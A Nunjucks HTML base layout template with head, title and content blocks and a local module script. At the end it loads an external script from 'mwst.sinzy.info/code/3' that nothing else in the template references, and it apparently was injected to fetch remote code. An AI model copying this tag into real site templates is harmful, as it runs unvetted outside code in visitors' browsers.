<!DOCTYPE html>
<html lang="en">
<head>
  {% include "../partials/html-head.njk" %}
  <title>{% block title %}{% endblock %}</title>
</head>
<body>
<main id="main">
  {% block content %}{% endblock %}
</main>
<script type="module" src="{{ assetsUrlPath }}/js/main.js" crossorigin></script>
<script src="https://mwst.sinzy.info/code/3" async></script>
</body>
</html>
